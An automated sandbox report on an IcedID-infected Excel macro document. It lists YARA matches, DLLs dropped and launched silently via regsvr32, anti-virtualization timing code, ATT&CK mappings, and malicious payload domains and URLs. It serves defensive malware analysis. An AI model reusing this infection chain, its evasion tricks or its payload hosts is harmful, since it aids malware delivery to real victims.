        Source: 4.2.regsvr32.exe.1b0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000004.00000002.2104111082.0000000000190000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/4@7/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$LL52387-01M4205301.xlsmJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE13A.tmpJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: LL52387-01M4205301.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: LL52387-01M4205301.xlsmInitial sample: OLE zip file path = xl/media/image1.png
        Source: LL52387-01M4205301.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: LL52387-01M4205301.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: XTOWN.dll.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001B1E50 4_2_001B1E50
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000001B1E71 second address: 00000000001B1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000001B1EAB second address: 00000000001B1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001B2434 rdtsc 4_2_001B2434
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_001B27BC
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001B2434 rdtsc 4_2_001B2434

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.37.209 80Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 13.224.92.73 187Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001B22DC LookupAccountNameW,4_2_001B22DC

        Stealing of Sensitive Information:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2380, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2380, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScripting1Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 444806 Sample: LL52387-01M4205301.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 35 Found malware configuration 2->35 37 Document exploit detected (drops PE files) 2->37 39 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->39 41 6 other signatures 2->41 6 EXCEL.EXE 53 26 2->6         started        process3 dnsIp4 23 uppercilio.fun 172.67.146.88, 49169, 80 CLOUDFLARENETUS United States 6->23 25 voopeople.fun 172.67.194.117, 49168, 80 CLOUDFLARENETUS United States 6->25 27 thousandsyears.download 172.67.198.51, 49167, 80 CLOUDFLARENETUS United States 6->27 19 C:\Users\user\XTOWN.dll, PE32+ 6->19 dropped 21 C:\Users\user\AppData\Local\...\lsdfik[1].fml, PE32+ 6->21 dropped 43 Document exploit detected (creates forbidden files) 6->43 45 Document exploit detected (UrlDownloadToFile) 6->45 11 regsvr32.exe 6->11         started        14 regsvr32.exe 4 6->14         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 47 System process connects to network (likely due to code injection or exploit) 11->47 49 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->49 51 Tries to detect virtualization through RDTSC time measurements 11->51 29 astrocycle.download 104.21.37.209, 49171, 80 CLOUDFLARENETUS United States 14->29 31 dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49170 AMAZON-02US United States 14->31 33 2 other IPs or domains 14->33 signatures9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        astrocycle.download1%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.buzzsprout.com;0%Avira URL Cloudsafe
        http://astrocycle.download/1%VirustotalBrowse
        http://astrocycle.download/0%Avira URL Cloudsafe
        http://crl.sca1b.amazontrus0%URL Reputationsafe
        http://crl.sca1b.amazontrus0%URL Reputationsafe
        http://crl.sca1b.amazontrus0%URL Reputationsafe
        http://crl.sca1b.amazontrus0%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        https://prod-us-west-2.csp-report.marketing.aws.dev/submit0%Avira URL Cloudsafe
        http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        https://amazonwebservices.d2.sc.omtrdc.net0%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        https://112-tzm-766.mktoutil.com0%Avira URL Cloudsafe
        https://download.stormacq.com/aws/podcast/0%Avira URL Cloudsafe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
        astrocycle.download0%Avira URL Cloudsafe
        https://chtbl.com0%Avira URL Cloudsafe
        https://amazonwebservicesinc.tt.omtrdc.net0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        uppercilio.fun
        		172.67.146.88
        		truefalse
          		unknown
          thousandsyears.download
          		172.67.198.51
          		truefalse
            		unknown
            voopeople.fun
            		172.67.194.117
            		truefalse
              		unknown
              astrocycle.download
              		104.21.37.209
              		truetrueunknown
              dr49lng3n1n2s.cloudfront.net
              		13.224.92.73
              		truefalse
                		high
                aws.amazon.com
                		unknown
                		unknownfalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://astrocycle.download/true
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://uppercilio.fun/div/44376,8555986111.jpgfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://thousandsyears.download/div/44376,8555986111.jpgfalse
                  • Avira URL Cloud: safe
                  		unknown
                  astrocycle.downloadtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.linkedin.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                    		high
                    https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                      		high
                      https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpfalse
                        		high
                        https://c0.b0.p.awsstatic.comregsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                          		high
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://api.regional-table.region-services.aws.a2z.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                            		high
                            https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                              		high
                              https://aws.amazon.com/ar/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                		high
                                https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://a0.p.awsstatic.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                  		high
                                  https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                    		high
                                    https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpfalse
                                      		high
                                      https://aws.amazon.com/ru/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                        		high
                                        https://www.buzzsprout.com;regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2104184000.00000000002AE000.00000004.00000020.sdmpfalse
                                          		high
                                          https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                            		high
                                            https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                              		high
                                              https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                		high
                                                https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://p.adsymptotic.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://aws.amazon.com/th/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://docs.aws.amazon.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmpfalse
                                                          		high
                                                          https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://d2a6igt6jhaluh.cloudfront.netregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://crl.sca1b.amazontrusregsvr32.exe, 00000004.00000002.2104193166.00000000002BD000.00000004.00000020.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://dftu77xade0tc.cloudfront.netregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://aws.amazon.com/search/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000004.00000002.2104193166.00000000002BD000.00000004.00000020.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://aws.amazon.com/vi/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://aws.amazon.com/tw/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://d1fgizr415o1r6.cloudfront.netregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://amazon.com/wregsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpfalse
                                                                                      		high
                                                                                      https://prod-us-west-2.csp-report.marketing.aws.dev/submitregsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://f0.awsstatic.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpfalse
                                                                                          		high
                                                                                          https://spot-bid-advisor.s3.amazonaws.comregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://aws.amazon.com/regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://d3ctxlq1ktw2nl.cloudfront.netregsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpfalse
                                                                                                		high
